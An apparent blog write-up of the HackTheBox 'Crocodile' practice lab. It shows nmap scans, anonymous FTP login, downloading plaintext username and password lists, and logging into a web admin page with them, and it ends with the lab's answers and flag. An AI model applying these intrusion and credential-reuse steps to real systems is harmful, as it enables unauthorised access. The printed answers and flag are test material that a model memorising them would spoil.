Crocodile is really awesome challenge by HackTheBox to practice skills related to Hacking. In today’s writeup we are going to solve this challenge.
First of all fire your terminal
and scan for services running on the machine like
wesecure1337@kali:~$ nmap -sC 10.129.97.148
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-28 16:53 IST
Nmap scan report for 10.129.97.148
Host is up (0.48s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE
21/tcp open ftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 ftp ftp 33 Jun 08 2021 allowed.userlist
|_-rw-r--r-- 1 ftp ftp 62 Apr 20 2021 allowed.userlist.passwd
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.10.16.80
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp open http
|_http-title: Smash - Bootstrap Business TemplateNmap done: 1 IP address (1 host up) scanned in 68.81 seconds
Here -sC
is used to specify that we want to scan for this server for known vulnerabilities.
In your terminal
type nmap
the help page of nmap
is open
wesecure1337@kali:~$ nmap
...
-sC: equivalent to --script=default
...
-sC
specify the default scripts.
From scan results our useful information is
PORT STATE SERVICE
21/tcp open ftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 ftp ftp 33 Jun 08 2021 allowed.userlist
|_-rw-r--r-- 1 ftp ftp 62 Apr 20 2021 allowed.userlist.passwd
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.10.16.80
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp open http
|_http-title: Smash - Bootstrap Business Template
We can clearly see that we can login onftp
using anonymous
as username.
Let’s solve the Tasks
TASK 1What nmap scanning switch employs the use of default scripts during a scan?
-sC
Let’s scan for version information on ftp
server
wesecure1337@kali:~$ nmap -sV -p21 10.129.97.148
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-28 17:01 IST
Nmap scan report for 10.129.97.148
Host is up (0.27s latency).PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
Service Info: OS: UnixService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.78 seconds
This brings us to
TASK 2What service version is found to be running on port 21?
vsftpd 3.0.3
Now let’s login to the ftp
wesecure1337@kali:~$ ftp 10.129.97.148
Connected to 10.129.97.148.
220 (vsFTPd 3.0.3)
Name (10.129.97.148:wesecure1337): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
Finally we are logged into the ftp
server
TASK 3What FTP code is returned to us for the "Anonymous FTP login allowed" message?
230
Now we are going to explore the ftp
ftp> ls
229 Entering Extended Passive Mode (|||45302|)
150 Here comes the directory listing.
-rw-r--r-- 1 ftp ftp 33 Jun 08 2021 allowed.userlist
-rw-r--r-- 1 ftp ftp 62 Apr 20 2021 allowed.userlist.passwd
226 Directory send OK.ftp> get allowed.userlist
local: allowed.userlist remote: allowed.userlist
229 Entering Extended Passive Mode (|||41011|)
150 Opening BINARY mode data connection for allowed.userlist (33 bytes).
100% |***************************************| 33 0.04 KiB/s 00:00 ETA
226 Transfer complete.
33 bytes received in 00:01 (0.02 KiB/s)ftp> get allowed.userlist.passwd
local: allowed.userlist.passwd remote: allowed.userlist.passwd
229 Entering Extended Passive Mode (|||42792|)
150 Opening BINARY mode data connection for allowed.userlist.passwd (62 bytes).
100% |***************************************| 62 0.09 KiB/s 00:00 ETA
226 Transfer complete.
62 bytes received in 00:01 (0.05 KiB/s)
ftp>
get
command is used to get files from the ftp
server to our local machine.
TASK 4What command can we use to download the files we find on the FTP server?
get
Now we have two files viz. allowed.userlist
and allowed.userlist.passwd
. Come back to your main machine and check for the files
ftp> exitwecesure1337@kali:~$ ls
allowed.userlist
allowed.userlist.passwdwecesure1337@kali:~$ cat allowed.userlist
aron
pwnmeow
egotisticalsw
adminwecesure1337@kali:~$ cat allowed.userlist.passwd
root
Supersecretpassword1
@BaASD&9032123sADS
rKXM59ESxesUFHAd
Seeing the files brings us to
TASK 5What is one of the higher-privilege sounding usernames in the list we retrieved?
admin
Go to your teminal
and follow the steps
wesecure1337@kali:~$ nmap -sV -p80 10.129.97.148
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-28 17:18 IST
Nmap scan report for 10.129.97.148
Host is up (0.20s latency).PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.63 seconds
From the result we conclude that
TASK 6What version of Apache HTTP Server is running on the target host?
2.4.41
wappalyzer
is a tool which can be installed as a plugin in the browser for analysing the websites
TASK 7What is the name of a handy web site analysis plug-in we can install in our browser?
Wappalyzer
From the help menu of gobuster
we know that -x
is used to specify the specific filetype
TASK 8What switch can we use with gobuster to specify we are looking for specific filetypes?
-x
By using gobuster
we have found a directory login.php.
TASK 9What file have we found that can provide us a foothold on the target?
login.php
So let’s navigate to it
Now login with username admin
and password as rKXM59ESxesUFHAd , which we have retrieved from the ftp server.
And finally we have successfully found the flag for this challenge.
SUBMIT FLAGSubmit root flag
c7110277ac44d78b6a9fff2232434d16
Voila!!! We have successfully solved the Crocodile Starting Point Challenge by HackTheBox. If you really enjoyed reading the Writeup[Walkthrough], then do checkout out other articles.
Let’s get connected
Twitter: proton_sec
GitHub: proton-sec
LinkedIn: protonsec
If you want to appreciate and support my work here you go…
Thanks for Reading!!!